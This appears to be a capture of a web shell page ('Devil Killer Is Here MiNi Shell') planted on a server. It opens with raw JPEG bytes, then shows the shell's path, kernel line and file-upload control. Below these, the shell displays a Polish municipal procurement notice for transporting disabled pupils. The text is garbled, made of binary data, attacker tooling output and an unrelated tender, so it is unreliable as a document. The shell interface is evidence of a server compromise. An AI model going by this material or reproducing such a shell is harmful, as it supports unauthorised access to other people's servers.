JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240521/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240521/0033344301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów niepełnosprawnych z terenu Gminy Ornontowice do specjalistycznych placówek oświatowych<br/>w roku szkolnym 2024/2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ornontowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276257759</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zwycięstwa 26a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ornontowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-178</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@ornontowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.ornontowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów niepełnosprawnych z terenu Gminy Ornontowice do specjalistycznych placówek oświatowych<br/>w roku szkolnym 2024/2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6606b3ae-175c-11ef-bfd3-e6cc5d6d04e5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00333443</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00572102/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowóz uczniów niepełnosprawnych z terenu Gminy Ornontowice do specjalistycznych placówek oświatowych w roku szkolnym 2024/2025</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-zp.ornontowice.pl/procurements/115/procurement <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-zp.ornontowice.pl/procurements/115/procurement</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Systemu E-Zamówienia Publiczne Gminy<br/>Ornontowice (zwanego w niniejszej SWZ „Systemem E-ZP”) dostępnego pod adresem: https://e-zp.ornontowice.pl oraz przy użyciu<br/>poczty elektronicznej zp@ornontowice.pl.<br/>Szczegóły opisano w rozdziale VIII SWZ.<br/>Ofertę, oświadczenie, o których mowa w art. 125 ust. 1 ustawy Pzp należy złożyć pod rygorem nieważności w formie elektronicznej<br/>(tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym (E-dowód).<br/>Szczegóły opisano w rozdziale VI SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegóły opisano w Rozdziale I SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegóły opisano w Rozdziale I SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZWRZP.271.00007.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przewóz dzieci/uczniów z niepełnosprawnościami zwanymi dalej uczniami wraz z zapewnieniem im opieki do placówek oświatowych/szkół/przedszkola w roku szkolnym 2024/2025<br/>tj. od 2 września 2024 r. do 27 czerwca 2025 r. z terenu Gminy Ornontowice:<br/>a) zakres zadania przewidziany do realizacji w ramach zamówienia podstawowego:<br/>- trasa nr 1– dowóz do jednej placówki w Wyrach tj.: <br/>- Ośrodek Rehabilitacyjno-Edukacyjno-Wychowawczy przy ul. ks. Franciszka Bojdoła 3a<br/>(2 uczniów - kurs ranny oraz 2 uczniów kurs powrotny), maksymalny limit dzienny kilometrów dla trasy I: 37,4 km<br/><br/>- trasa nr 2 – dowóz połączony do dwóch szkół/placówek w Mikołowie tj.: <br/>- Ośrodek Rehabilitacyjno-Edukacyjno-Wychowawczy przy ul. Słowackiego 21 c (2 uczniów),<br/>- Zespół Szkół Nr 2 Specjalnych im. Marii Grzegorzewskiej przy ul. Pokoju 4a, (6 uczniów),<br/>- Zespół Szkół nr 1 Specjalnych w Mikołowie, Mikołów Borowa Wieś, ul. Gliwicka 366<br/>(1 uczeń),<br/>(9 uczniów kurs ranny oraz 8 uczniów kurs powrotny), maksymalny limit dzienny kilometrów dla trasy II: 62,3 km (kurs poranny 34,5 km, kurs powrotny 27,8 km)<br/><br/>- trasa nr 3 – dowóz połączony do trzech szkół na terenie Katowic tj.: <br/>- Niepubliczna Szkoła Podstawowa „Nasza Szkoła” przy ul. Harcerzy Września 1939 <br/>nr 5 (2 uczniów),<br/>- Niepubliczna Specjalna Szkoła Podstawowa „Arka Noego” przy ul. Gromadzkiej 59 <br/>(1 uczeń),<br/>- Zespół Szkół Zawodowych Specjalnych nr 6 - Szkoła Przysposabiająca do Pracy <br/>przy ul. Rolnej 22 (1 uczeń). <br/>( 4 uczniów kurs ranny oraz 2 uczniów kurs powrotny), maksymalny limit dzienny kilometrów dla trasy III: 58,7 km (kurs poranny 32,2 km, kurs powrotny 26,5 km)<br/><br/>b) zakres zadania przewidziany do realizacji w ramach prawa opcji: <br/>- trasa nr 4 – dowóz do jednej placówki w Żorach tj.:<br/>- Przedszkole Terapeutyczne Parasolki Żory, ul. Bankowa 4 (1 dziecko/uczeń),<br/>Wariant A (1 uczeń kurs ranny oraz 1 uczeń kurs powrotny), Wariant B (1 uczeń tylko kurs ranny), maksymalny limit dzienny dla trasy IV: Wariant A 17,5 km, maksymalny limit dzienny dla trasy IV: Wariant B 35,0 km<br/><br/>Warunkiem udzielenia zamówienia opcjonalnego jest złożenie u Zamawiającego pisemnego wniosku przez rodzica/opiekuna prawnego ucznia/dziecka niepełnosprawnego w sprawie dowożenia ucznia do szkoły/placówki oświatowej. <br/>Wartość zamówienia opcjonalnego nie może przekroczyć łącznie 30% wartości zamówienia podstawowego. <br/>Zamawiający podejmie decyzję o skorzystaniu z prawa opcji oraz jego zakresie (podjęcie decyzji o skorzystaniu z prawa opcji a także wybór wariantu A bądź wariantu B) najpóźniej w dniu zawarcia umowy z Wykonawcą.<br/>Wszystkie trasy zostaną objęte tą samą (jedną) umową zawartą z jednym Przewoźnikiem.<br/>Wykaz uczniów/dzieci niepełnosprawnych wraz z adresami zamieszkania ucznia/dziecka zostanie przekazany Wykonawcy w dniu zawarcia umowy zgodnie z zapisami załącznika nr 5 do SWZ (projektowane postanowienia umowy).<br/>Usługa dowożenia uczniów niepełnosprawnych z terenu Gminy Ornontowice z domu do specjalistycznych placówek oświatowych i z powrotem do domu wraz z zapewnieniem im opieki w czasie dowożenia, odbywać się będzie we wszystkie dni zajęć dydaktycznych, zgodnie z kalendarzem roku szkolnego 2024/2025 (188 dni), ogłaszanym przez Ministra Edukacji Narodowej oraz w przypadku odpracowywania zajęć w innym dniu wolnym od zajęć, również w tym dniu.<br/>Wykonawca zobowiązany jest do opracowania harmonogramu przewozów uczniów/dzieci uwzględniając punktualne dowiezienie uczniów/dzieci do szkół/placówek oświatowych oraz poinformowania rodziców/opiekunów prawnych dowożonych dzieci o harmonogramie przewozu oraz wszelkich jego zmianach.<br/>Szacunkowa liczba dni dowozu uczniów niepełnosprawnych wynosi od 2 września 2024 r. do 27 czerwca 2025 r. – 188 dni. <br/>Maksymalna dzienna suma kilometrów w jednym dniu dowozu, w zależności od ilości wykonanych dowozów wraz z opieką , wynosi łącznie w ramach zadnia podstawowego 158,4 km, dla zadania opcjonalnego jeżeli Zamawiający skorzysta z prawa opcji dla : Wariantu A 35,00 km/ Wariantu B 17,5 km.<br/><br/>Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych w opisie przedmiotu zamówienia, zgodnie z art. 100 ust. 1 ustawy Pzp. <br/><br/>Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy<br/>(Dz. U. z 2023 r., poz. 1465) kierowców pojazdów, którzy będą realizowali usługę dowozu dzieci/ uczniów niepełnosprawnych. Sposób weryfikacji zatrudnienia osób, o których mowa powyżej oraz uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę wymagań związanych z zatrudnieniem osób oraz sankcje z tytułu niespełnienia tych wymagań zostały opisane w projektowanych postanowieniach umownych stanowiących Załącznik nr 5 do SWZ. <br/><br/>Szczegółowy opis przedmiotu zamówienia stanowi załącznik:<br/>Załącznik nr 4 - Opis przedmiotu zamówienia<br/><br/>Nazwa/y i kody Wspólnego Słownika Zamówień: (CPV):<br/>60100000-9 Usługi w zakresie transportu drogowego<br/>60130000-8 Usługi w zakresie specjalistycznego transportu drogowego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zakres zadania przewidziany do realizacji w ramach prawa opcji: <br/>- trasa nr 4 – dowóz do jednej placówki w Żorach tj.:<br/>- Przedszkole Terapeutyczne Parasolki Żory, ul. Bankowa 4 (1 dziecko/uczeń),<br/>Wariant A (1 uczeń kurs ranny oraz 1 uczeń kurs powrotny), <br/>Wariant B (1 uczeń tylko kurs ranny), <br/>maksymalny limit dzienny dla trasy IV: Wariant A 17,5 km, <br/>maksymalny limit dzienny dla trasy IV: Wariant B 35,0 km<br/><br/>Warunkiem udzielenia zamówienia opcjonalnego jest złożenie u Zamawiającego pisemnego wniosku przez rodzica/opiekuna prawnego ucznia/dziecka niepełnosprawnego w sprawie dowożenia ucznia do szkoły/placówki oświatowej. <br/>Wartość zamówienia opcjonalnego nie może przekroczyć łącznie 30% wartości zamówienia podstawowego. <br/>Zamawiający podejmie decyzję o skorzystaniu z prawa opcji oraz jego zakresie (podjęcie decyzji o skorzystaniu z prawa opcji a także wybór wariantu A bądź wariantu B) najpóźniej w dniu zawarcia umowy z Wykonawcą.<br/>Wszystkie trasy zostaną objęte tą samą (jedną) umową zawartą z jednym Przewoźnikiem.<br/>Wykaz uczniów/dzieci niepełnosprawnych wraz z adresami zamieszkania ucznia/dziecka zostanie przekazany Wykonawcy w dniu zawarcia umowy zgodnie z zapisami załącznika nr 5 do SWZ (projektowane postanowienia umowy). <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował następującymi kryteriami:<br/>1) cena ofertowa – 60 %<br/>2) czas podstawienia pojazdu zastępczego – 40 % .</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu, określone przez Zamawiającego spośród warunków, o których mowa w art. 112 ust. 2 ustawy:<br/>1) W zakresie zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie stawia warunku w ww. zakresie. <br/> 2) W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/> Zamawiający uzna, że Wykonawca spełnia warunek w ww. zakresie, jeżeli wykaże, że posiada aktualne uprawnienia do wykonywania działalności polegającej na transporcie drogowym osób - obszar prowadzenia przewozu osób – Rzeczpospolita Polska, zgodnie z wymaganiami ustawy z dnia 6 września 2001r. o transporcie drogowym (Dz. U. z 2022 r. poz. 2201, z 2023 r. poz 760<br/>z późn. zm.). Zezwolenia lub licencje udzielone na podstawie uprzednio obowiązujących przepisów będą akceptowane, jeżeli zachowały moc prawną, nie wygasły bądź nie zostały cofnięte.<br/>3) W zakresie sytuacji ekonomicznej i finansowej:<br/>- dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego wraz z dowodem opłaty należnej składki<br/> – nie mniejszą niż 100 000,00 zł (zgodnie z Załącznikiem nr 5-projektowane postanowienia umowy).<br/>4) W zakresie zdolności technicznej lub zawodowej: <br/><br/>a) Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności technicznej lub zawodowej, jeżeli Wykonawca wykaże, że:<br/>- wykonał należycie w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, świadczył minimum 1 usługę w zakresie przewozu regularnego specjalnego (dowóz dzieci niepełnosprawnych do placówek oświatowych), o wartości min. 60 000,00 zł brutto. <br/>Pod pojęciem „przewozu regularnego specjalnego” należy rozumieć zapis zawarty w ustawie z dnia 6 września 2001r. o transporcie drogowym (Dz. U. z 2022 r. poz. 2201, z 2023 r. poz 760 <br/>z późn. zm.),<br/><br/>b) Wykonawca skieruje do realizacji zamówienia:<br/>co najmniej cztery pojazdy samochodowe dostosowane do przewozu osób niepełnosprawnych, dopuszczone do ruchu, posiadające aktualne polisy OC i NNW, wyposażone w bezwładnościowe trzypunktowe pasy bezpieczeństwa dla każdego pasażera (1 trasa – 1 pojazd): <br/>dla zadania podstawowego:<br/>– trasa 1: pojazd o min. 3 miejscach siedzących + 1 miejsce dla kierowcy + 1 miejsce dla opiekuna, <br/>– trasa 2: pojazd o min. 9 miejscach siedzących + 1 miejsce dla kierowcy + 1 miejsce dla opiekuna, <br/>– trasa 3: pojazd o min. 5 miejscach siedzących + 1 miejsce dla kierowcy + 1 miejsce dla opiekuna,<br/>dla zadania z prawa opcji:<br/>– trasa 4: pojazd o min. 3 miejscach siedzących + 1 miejsce dla kierowcy + 1 miejsce dla opiekuna, <br/>Wykonawca winien wziąć pod uwagę ewentualną konieczność zapewnienia w okresie realizacji zamówienia pojazdów przystosowanych do przewozu osób poruszających się na wózkach inwalidzkich na wszystkich trasach. <br/>Wykonawca winien wziąć pod uwagę ewentualną konieczność zapewnienia w okresie realizacji zamówienia większej ilości miejsc siedzących dla uczniów na wszystkich trasach – szczegóły zostały opisane w załączniku nr 5 – projektowane postanowienia umowy. <br/>Do realizacji usług dowozu Wykonawca zapewni pojazdy wyprodukowane nie wcześniej niż w roku 2005.<br/><br/>c) Wykonawca skieruje do realizacji zamówienia na każdej z tras:<br/>- minimum 1 osobę kierowcy– posiadającą kwalifikacje określone w opisie przedmiotu zamówienia, tj. minimum jednego kierowcę na każdej z tras posiadającego prawo jazdy uprawniające do kierowania pojazdami jak w opisie przedmiotu zamówienia. Zamawiający dopuszcza także odpowiadające im uprawnienia nabyte w państwach członkowskich Unii Europejskiej na zasadach określonych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394 ze zm.). Kierowcą musi być osoba pełnoletnia, niekarana, sprawna fizycznie, mówiąca w języku polskim, niefigurująca w Rejestrze Sprawców Przestępstw na Tle Seksualnym oraz posiadająca pełną zdolność do czynności prawnych<br/><br/>- minimum 1 osobę pełniącą funkcję opiekuna – posiadającą kwalifikacje w zakresie udzielania pierwszej pomocy przedmedycznej, tj. minimum jedną osobę opiekuna na każdej z tras posiadająca zaświadczenie o ukończonym kursie/szkoleniu w zakresie udzielania pierwszej pomocy przedmedycznej. Ze względu na specyfikę świadczonej usługi osoba sprawująca opiekę nad dziećmi nie może być kierowcą pojazdu. Opiekunem musi być osoba pełnoletnia, niekarana, sprawna fizycznie, niefigurująca w Rejestrze Sprawców Przestępstw na Tle Seksualnym oraz posiadająca pełną zdolność do czynności prawnych. <br/>Wykazując spełnienie warunku zdolności technicznej lub zawodowej Wykonawca winien mieć na uwadze regulacje z art. 117 ust.3 oraz 118 ust.2 ustawy Pzp tj.:<br/>- w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane,<br/> - w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">OŚWIADCZENIA I DOKUMENTY SKŁADANE WRAZ Z OFERTĄ<br/>1) Wykonawca może złożyć tylko jedną ofertę, oferta składana jest pod rygorem nieważności<br/>w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej podpisem zaufanym lub podpisem osobistym (E-dowód). Ofertę należy sporządzić zgodnie ze wzorem stanowiącym Załącznik nr 1 do SWZ.<br/>2) Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w rozdziale IV SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w rozdziale V ust. 2 pkt 1 SWZ. Oświadczenie należy złożyć zgodnie ze wzorem stanowiącym załącznik nr 2 do SWZ.<br/>3) Oświadczenie, o którym mowa w ust. 1 pkt 2 składają odrębnie:<br/>a) Wykonawca/każdy spośród Wykonawców Wspólnie ubiegających się o udzielenie zamówienia.<br/>W 